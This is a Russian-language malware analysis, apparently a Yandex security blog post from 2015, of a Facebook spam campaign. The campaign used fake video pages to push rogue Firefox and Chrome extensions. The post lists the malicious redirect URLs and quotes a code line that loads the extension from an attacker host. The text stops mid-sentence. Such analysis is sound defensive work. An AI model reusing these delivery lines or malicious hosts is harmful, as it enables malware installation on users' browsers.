Расследование Яндекса: full disclosure о вирусе на Facebook19.01.2015 15:18

В середине декабря в российском сегменте Facebook можно было наблюдать массовое заражение пользователей вирусом, который распространялся посредством спам-рассылок личных сообщений и публикаций со ссылками на якобы приватное видео.По информации СМИ, Facebook справился с угрозой и заблокировал распространение вредоносных сообщений. Однако позже мы обнаружили дальнейшее распространение ряда вредоносных ссылок и решили разобраться в том, как работает эта атака, чтобы защитить от неё пользователей Яндекс.Браузера.

СМИ сообщали, что виной всему было вредоносное расширение YouTurn для браузера Chrome, которое пользователю предлагалось установить, если он переходил по ссылке, полученной от своего зараженного друга. Но мы выяснили, что в рамках этого заражения использовалось несколько расширений. YouTurn, кстати, 16 декабря уже было удалено из ChromeStore.

image

Все они были одинаково устроены, но распространялись под разными названиями и в разное время через фишинговые ресурсы, похожие на страницу Facebook и размещённые на Amazon S3. Интересно, что помимо механизмов распространения они подгружали во все вкладки браузера рекламные баннеры с сомнительным содержимым и предоставляли доступ к аккаунту зараженного пользователя внутреннему приложению с некоторым ID, которое Facebook тоже заблокировал.

Итак, таким ли безобидным был этот «вирус», и что в нём было нового?

Анализ схемы распространения зловредаВредоносная ссылка во всех случаях была сгенерирована с помощью различных сервисов сокращения, при переходе на нее пользователь отправлялся по цепочке серверных редиректов, например: http://goo.gl/rlzp52 → https://dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741? MYBn8KdpVhlnHNc0drEE → https://dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE= ,

конечным пунктом была веб-страничка на dropboxusercontent.com. Она содержала очень простые js-скрипты, главной функцией которых была проверка браузерного объекта «navigator» и выполнение редиректа в зависимости от его значения. Мобильные пользователи и пользователи IE перенаправлялись на веб-страницу teladea.blogspot.com, которая содержала видеоролик с пародией на фильм «Пятница, 13-е» и ссылку на сайт Красного Креста.

b85c07bf51d24bb090a0c7c871da6c28.png

Пользователей Firefox скрипты редиректили по ссылке http://video51828.s3-website-us-west-2.amazonaws.com/mf39.html, а перешедших по ссылке в Chrome уводили на http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html, ну и пользователь с подстрокой «Facebook-bot» в navigator перенаправлялся на Google.

6a8586d0ee1a43099c9574c7b6e057e8.pngКод landing-page

Веб-страница для пользователей Firefox (http://video51828.s3-website-us-west-2.amazonaws.com/mf49.html) была замаскирована под YouTube (веб-контент формировался преимущественно через js). Если пользователь заходил на данную страничку с мобильного устройства на базе платформы Android, выполнялся редирект на веб страницу s.html, которая на момент анализа была уже недоступна. Если же браузер был десктопный, страница вместо видео показывала сообщение о том, что для просмотра необходимо обязательно обновить FlashPlayer. Полный код можно увидеть тут.

43b7a9317d984fe08e5b4552e3cf1a1d.png

При нажатии на на кнопку «update Player» в браузер Firefox устанавливалось расширение для браузера «PremiumCodec», которое загружалось по ссылке http://premiumd1.mzzhost.com/premiumD.xpi. Интересно, что Firefox требует дополнительного разрешение установки расширения, но злоумышленники учли этот момент и c помощью js-кода после нажатия обновления плеера формировали дополнительный , показывающий картинку с указателем, куда надо нажимать, чтобы разрешить установку.

77ebb3a40cba43c2b5778ced895206e0.PNG

Непосредственно установка расширения осуществлялась при выполнении кода:

top[«location»] = http://premiumd1.mzzhost.com/premiumD.xpi.

За эту функциональность отвечал обфусцированный js-скрипт, который располагался прямо на странице.

82e35e3240c74a96b30a710026c94e5b.pngФрагмент деобфусцированого кода установки расширения в FireFox

Анализ расширения представлен ниже в соответствующем разделе поста.

Веб-страница для пользователей Chrome (http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html) также была фишинговой и пыталась выдавать себя за Facebook. Ее содержимое также генерировалось с помощью javascript.

d69d4e59a680429f85cc5034e7ee57f8.png

Полный код страницы можно посмотреть тут.

При нажатии на область с видеороликом пользователю сообщалось, что у него не найден проигрыватель, и предлагалось поставить специальное расширение для браузера, чтобы компенсировать этот досадный недостаток. В нашем случае это было расширение YouTube Now (id akmghomonnhljmlfemmifjblglkacfhg), которое устанавливалось из Chrome Web Store c помощью js-механизма chrome.webstore.install.

ce4ea4274d76408a8a2673ca5ad7742e.pngФрагмент деобфусцированного скрипта установки расширения

8920f94237a14e03b24d7576c6f95cbf.pngСтраница приложения в Chrome Web Store

В качестве источника для расширения был указан тот же самый адрес веб-сайта на Amazon S3, c которого оно и распространялось.

Анализ расширения для Firefox Расширение состояло из целого ряда файлов, оно было построено на основе платформы Crossbrowser.com, но обладало очень простой функциональностью. Оно вставляло во все открытые вкладки браузера скрипт http://adeaditi.info/kmain.js путем добавления нового тега